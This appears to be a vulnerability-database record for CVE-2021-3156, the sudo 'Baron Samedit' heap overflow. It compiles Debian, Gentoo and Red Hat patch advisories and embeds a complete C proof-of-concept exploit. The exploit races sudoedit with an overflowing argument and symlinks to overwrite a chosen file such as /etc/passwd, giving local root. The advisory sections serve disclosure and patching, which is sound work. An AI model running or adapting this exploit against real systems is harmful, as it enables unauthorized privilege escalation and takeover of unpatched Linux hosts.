ID

VAR-202101-1926

CVE

CVE-2021-3156

TITLE

Sudo set_cmd() is vulnerable to heap-based buffer overflow

DESCRIPTION

Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character. A heap-based overflow has been discovered in the set_cmd() function in sudo, which may allow a local attacker to execute commands with elevated administrator privileges.CVE-2021-3156 AffectedCVE-2021-3156 Affected. Any local user (sudoers and non-sudoers) can exploit this flaw for root privilege escalation. For the stable distribution (buster), this problem has been fixed in version 1.8.27-1+deb10u3. We recommend that you upgrade your sudo packages. For the detailed security status of sudo please refer to its security tracker page at: https://security-tracker.debian.org/tracker/sudo Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmAQWctfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Qr2w/5AfAZMSbKestTzvm22w+T5yReGOd2jYXO2SzdqdkIzOVXJ83RrbogkiyK d1ie47Csw51M8L5eT/kf48vkABPqT9S0dlRI7rQ2xbIDWIUcDpnFNCSclSGjI+Sd HqtaQQbR+MdSjGtC8vc8RVEOEQcVvoXrqDPaEniWjA4uTV7Iqj0P3EpH1XolVlZv lw4ZZ+VdDolxhm1QWp/NiMKUlDpv5RLs6jW0oQAKP1RZqMIX44TSEHil/NEs6VeN u5AFUwo5iwYRCUbgi2mB0GxV4CRyb0IN26pGsltYJsReFL1vCMiO9drGMk/WhlqB NGKeF5rLsMKaJCkBEcMntDG1XtFhXuyak2O4atL7H8CwhBZ81Axe+aAynn7IB99B qx3GLfRNSVKHQHBHWEOxqILCS+xWmvL6/uB6xMaAh5CXxhEgs9BIEiPonccmkzQ9 xj6Uw/aWv9ZOUu+Rwmp+bG/V8DKaFKegaQAy0HnhOZ11ruJJB/YicTXSsbxoLSEt hbd0bYAOrZBqcysH8Ed+R2tGxtjoWIDLcv3uUqmttxgd8E5YpGGngaYBleGCnB0s X3JDyd1pvBu7H0vR5k2bVNgm4qQ27jHmeNKRSpvUZv50mRX8NQyv/rrROwkUsVdI 1EnlHYz0E4BUfb15ECWLfN9BM/MyPhkdKadIrrd+zJEwq+KVcHo= =d9gQ -----END PGP SIGNATURE----- . # Exploit Title: Local Privilege Escalation - LPE # Authors and Contributors: cts, help from r4j, debug by nu11secur1ty # Date: 30.01.2021 # Vendor: https://www.sudo.ws/ # Link: https://www.sudo.ws/download.html # CVE: CVE-2021-3156 [+] Credits: Ventsislav Varbanovski (@ nu11secur1ty) [+] Website: https://www.nu11secur1ty.com/ [+] Source: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156/1.30.2021 [Exploit Program Code] // Exploit by @gf_256 aka cts // With help from r4j // Debug by @nu11secur1ty // Original advisory by Baron Samedit of Qualys // Tested on Ubuntu 18.04 and 20.04 & 20.04.01 // You will probably need to adjust RACE_SLEEP_TIME. #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <string.h> #include <stdlib.h> #include <assert.h> #include <unistd.h> #include <sys/wait.h> #include <sys/types.h> #include <sys/resource.h> #include <sys/stat.h> #include <unistd.h> #include <fcntl.h> #include <pwd.h> // !!! best value of this varies from system-to-system !!! // !!! you will probably need to tune this !!! #define RACE_SLEEP_TIME 10000 char *target_file; char *src_file; size_t query_target_size() { struct stat st; stat(target_file, &st); return st.st_size; } char* read_src_contents() { FILE* f = fopen(src_file, "rb"); if (!f) { puts("oh no baby what are you doing :("); abort(); } fseek(f, 0, SEEK_END); long fsize = ftell(f); fseek(f, 0, SEEK_SET); char *content = malloc(fsize + 1); fread(content, 1, fsize, f); fclose(f); return content; } char* get_my_username() { // getlogin can return incorrect result (for example, root under su)! struct passwd *pws = getpwuid(getuid()); return strdup(pws->pw_name); } int main(int my_argc, char **my_argv) { puts("CVE-2021-3156 PoC by @gf_256"); puts("original advisory by Baron Samedit"); if (my_argc != 3) { puts("./meme <target file> <src file>"); puts("Example: ./meme /etc/passwd my_fake_passwd_file"); return 1; } target_file = my_argv[1]; src_file = my_argv[2]; printf("we will overwrite %s with shit from %s\n", target_file, src_file); char* myusername = get_my_username(); printf("hi, my name is %s\n", myusername); size_t initial_size = query_target_size(); printf("%s is %zi big right now\n", target_file, initial_size); char* shit_to_write = read_src_contents(); char memedir[1000]; char my_symlink[1000]; char overflow[1000]; char* bigshit = calloc(1,0x10000); memset(bigshit, 'A', 0xffff); // need a big shit in the stack so the write doesn't fail with bad address char *argv[] = {"/usr/bin/sudoedit", "-A", "-s", "\\", overflow, NULL }; char *envp[] = { "\n\n\n\n\n", // put some fuckin newlines here to separate our real contents from the junk shit_to_write, "SUDO_ASKPASS=/bin/false", "LANG=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ", bigshit, NULL }; puts("ok podracing time bitches"); // Boom =) // for (int i = 0; i < 5000; i++) for (int i = 0; i < 3000; i++) { sprintf(memedir, "ayylmaobigchungussssssssssss00000000000000000000000000%08d", i); sprintf(overflow, "11111111111111111111111111111111111111111111111111111111%s", memedir); sprintf(my_symlink, "%s/%s", memedir, myusername); puts(memedir); if (access(memedir, F_OK) == 0) { printf("dude, %s already exists, do it from a clean working dir\n", memedir); return 1; } pid_t childpid = fork(); if (childpid) { // parent usleep(RACE_SLEEP_TIME); mkdir(memedir, 0700); symlink(target_file, my_symlink); waitpid(childpid, 0, 0); } else { // child setpriority(PRIO_PROCESS, 0, 20); // set nice to 20 for race reliability execve("/usr/bin/sudoedit", argv, envp); // noreturn puts("execve fails?!"); abort(); } if (query_target_size() != initial_size) { puts("target file has a BRUH MOMENT!!!! SUCCess???"); system("xdg-open 'https://www.youtube.com/watch?v=cj_8X1cyVFc'"); // ayy lmao return 0; } } puts("Failed?"); puts("if all the meme dirs are owned by root, the usleep needs to be decreased."); puts("if they're all owned by you, the usleep needs to be increased"); return 0; } [Vendor] Sudo [Vulnerability Type] Buffer Overflow Local Privilege Escalation [CVE Reference] Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character. [Security Issue] Taking control of the Linux system Vulnerabilty version: before 1.9.5p2 [Video] https://www.youtube.com/watch?v=L-dEIYEQd1E [Conclusion and Fix] https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156 https://www.youtube.com/watch?v=zf8FXOFWZKs @nu11secur1ty https://www.nu11secur1ty.com/ . 7.7) - ppc64, ppc64le, s390x, x86_64 3. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202101-33 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: sudo: Multiple vulnerabilities Date: January 26, 2021 Bugs: #764986, #767364 ID: 202101-33 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======= Multiple vulnerabilities have been found in sudo, the worst of which could result in privilege escalation. Affected packages ================ ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-admin/sudo < 1.9.5_p2 >= 1.9.5_p2 Description ========== Multiple vulnerabilities have been discovered in sudo. Please review the CVE identifiers referenced below for details. Impact ===== Local users are able to gain unauthorized privileges on the system or determine the existence of files. Workaround ========= There is no known workaround at this time. Resolution ========= All sudo users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-admin/sudo-1.9.5_p2" References ========= [ 1 ] CVE-2021-23239 https://nvd.nist.gov/vuln/detail/CVE-2021-23239 [ 2 ] CVE-2021-23240 https://nvd.nist.gov/vuln/detail/CVE-2021-23240 [ 3 ] CVE-2021-3156 https://nvd.nist.gov/vuln/detail/CVE-2021-3156 [ 4 ] Upstream advisory (CVE-2020-23240) https://www.sudo.ws/alerts/sudoedit_selinux.html [ 5 ] Upstream advisory (CVE-2021-3156) https://www.sudo.ws/alerts/unescape_overflow.html Availability =========== This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/202101-33 Concerns? ======== Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ====== Copyright 2021 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . 8.1) - aarch64, ppc64le, s390x, x86_64 3. Relevant releases/architectures: RHEL 7-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64 Red Hat Virtualization 4 Hypervisor for RHEL 7 - noarch Red Hat Virtualization 4 Management Agent for RHEL 7 Hosts - noarch, ppc64le, x86_64 3. These packages include redhat-release-virtualization-host. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks. Bug Fix(es): * When performing an upgrade of the Red Hat Virtualization Host using the command `yum update`, the yum repository for RHV 4.3 EUS is unreachable As a workaround, run the following command: `# yum update --releasever=7Server` (BZ#1899378) 4. Bugs fixed (https://bugzilla.redhat.com/): 1889686 - CVE-2020-25684 dnsmasq: loose address/port check in reply_query() makes forging replies easier for an off-path attacker 1889688 - CVE-2020-25685 dnsmasq: loose query name check in reply_query() makes forging replies easier for an off-path attacker 1890125 - CVE-2020-25686 dnsmasq: multiple queries forwarded for the same name makes forging replies easier for an off-path attacker 1899378 - rhel-7-server-rhvh-4.3-eus-rpms repo is unavailable 1916111 - Rebase RHV-H 4.3 EUS on RHEL 7.9.z #3 1917684 - CVE-2021-3156 sudo: Heap buffer overflow in argument parsing 6. 7.2) - x86_64 3. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Important: sudo security update Advisory ID: RHSA-2021:0223-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:0223 Issue date: 2021-01-26 CVE Names: CVE-2021-3156 ==================================================================== 1. Summary: An update for sudo is now available for Red Hat Enterprise Linux 7.6 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux ComputeNode EUS (v. 7.6) - x86_64 Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.6) - x86_64 Red Hat Enterprise Linux Server EUS (v. 7.6) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 7.6) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, ppc64le, s390x Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le, s390x 3. Description: The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root. Security Fix(es): * sudo: Heap buffer overflow in argument parsing (CVE-2021-3156) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1917684 - CVE-2021-3156 sudo: Heap buffer overflow in argument parsing 6. Package List: Red Hat Enterprise Linux ComputeNode EUS (v. 7.6): Source: sudo-1.8.23-3.el7_6.2.src.rpm x86_64: sudo-1.8.23-3.el7_6.2.x86_64.rpm sudo-debuginfo-1.8.23-3.el7_6.2.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.6): x86_64: sudo-debuginfo-1.8.23-3.el7_6.2.i686.rpm sudo-debuginfo-1.8.23-3.el7_6.2.x86_64.rpm sudo-devel-1.8.23-3.el7_6.2.i686.rpm sudo-devel-1.8.23-3.el7_6.2.x86_64.rpm Red Hat Enterprise Linux Server EUS (v. 7.6): Source: sudo-1.8.23-3.el7_6.2.src.rpm ppc64: sudo-1.8.23-3.el7_6.2.ppc64.rpm sudo-debuginfo-1.8.23-3.el7_6.2.ppc64.rpm ppc64le: sudo-1.8.23-3.el7_6.2.ppc64le.rpm sudo-debuginfo-1.8.23-3.el7_6.2.ppc64le.rpm s390x: sudo-1.8.23-3.el7_6.2.s390x.rpm sudo-debuginfo-1.8.23-3.el7_6.2.s390x.rpm x86_64: sudo-1.8.23-3.el7_6.2.x86_64.rpm sudo-debuginfo-1.8.23-3.el7_6.2.x86_64.rpm Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7): Source: sudo-1.8.23-3.el7_6.2.src.rpm aarch64: sudo-1.8.23-3.el7_6.2.aarch64.rpm sudo-debuginfo-1.8.23-3.el7_6.2.aarch64.rpm ppc64le: sudo-1.8.23-3.el7_6.2.ppc64le.rpm sudo-debuginfo-1.8.23-3.el7_6.2.ppc64le.rpm s390x: sudo-1.8.23-3.el7_6.2.s390x.rpm sudo-debuginfo-1.8.23-3.el7_6.2.s390x.rpm Red Hat Enterprise Linux Server Optional EUS (v. 7.6): ppc64: sudo-debuginfo-1.8.23-3.el7_6.2.ppc.rpm sudo-debuginfo-1.8.23-3.el7_6.2.ppc64.rpm sudo-devel-1.8.23-3.el7_6.2.ppc.rpm sudo-devel-1.8.23-3.el7_6.2.ppc64.rpm ppc64le: sudo-debuginfo-1.8.23-3.el7_6.2.ppc64le.rpm sudo-devel-1.8.23-3.el7_6.2.ppc64le.rpm s390x: sudo-debuginfo-1.8.23-3.el7_6.2.s390.rpm sudo-debuginfo-1.8.23-3.el7_6.2.s390x.rpm sudo-devel-1.8.23-3.el7_6.2.s390.rpm sudo-devel-1.8.23-3.el7_6.2.s390x.rpm x86_64: sudo-debuginfo-1.8.23-3.el7_6.2.i686.rpm sudo-debuginfo-1.8.23-3.el7_6.2.x86_64.rpm sudo-devel-1.8.23-3.el7_6.2.i686.rpm sudo-devel-1.8.23-3.el7_6.2.x86_64.rpm Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7): aarch64: sudo-debuginfo-1.8.23-3.el7_6.2.aarch64.rpm sudo-devel-1.8.23-3.el7_6.2.aarch64.rpm ppc64le: sudo-debuginfo-1.8.23-3.el7_6.2.ppc64le.rpm sudo-devel-1.8.23-3.el7_6.2.ppc64le.rpm s390x: sudo-debuginfo-1.8.23-3.el7_6.2.s390.rpm sudo-debuginfo-1.8.23-3.el7_6.2.s390x.rpm sudo-devel-1.8.23-3.el7_6.2.s390.rpm sudo-devel-1.8.23-3.el7_6.2.s390x.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2021-3156 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/RHSB-2021-002 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYBCATtzjgjWX9erEAQiDkQ/8CyCFW0G3itmCMGwXsP5atS6Tgqc4zwbC ofAgAgWoKKlwelFIMra1XlbcwSiqDKyxRvZVXiberbmvsecRShd7y29CMf75R2FO P7qGv5BY8BLX0zDwHHNTSCdX4EXoMi4OUUzmO4JEgys8Vc0QfLyEpQJbIPJaeE/C OI6niwwsSKeB06CjOpmHef/xoltdiCRkAJ84A3wBN8L603Lbl7Ou1PpomXFTmBpx 1ZI+vHe+rGXLMLYsJOyZSi87spHiXX7ZUwHwf3LOpQvIEP3tTU7QVykAsB2nIWIh VVqjPwOeK4wxM1xn2DtBAeBE1m3QG9xBirIQosAUqh8v7coWyy+kNZxxnFKS8v5F ZuQpsM2c0EbEcz7QL703in6m/1fG8oT6QI/K0PQvAQBlxt4XG0N1Shz1XfCa884z 0xF5C31bd8tDOuakZNPg7ePLXpaZtyn/CZ5kyWIaSkMV5J1vYZIHPyJpb83QecUr c9vjQgD49kz2FzwJkGPcWAeqjBVFrRbE7TJQ8IAzkM08x6XeKuLp8sXixzhXzboy 9TBb65s22fEiHlMCcqW62QJGELPDLSwVvjasnX0tzkSE5t6NYV6HDbHRYcHJEG2b BWwYRlTvgfK1sodYoCGs6IeJVD8nHIeflNgkn0WQIbOznJjmBjgXXGGdj0XPDDuD l3p+edOWn0U=GeG5 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

local

TYPE

buffer error

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

This document was written by Timur Snoke.Statement Date:   February 15, 2021

SOURCES

LAST UPDATE DATE

2026-04-18T21:57:28.795000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE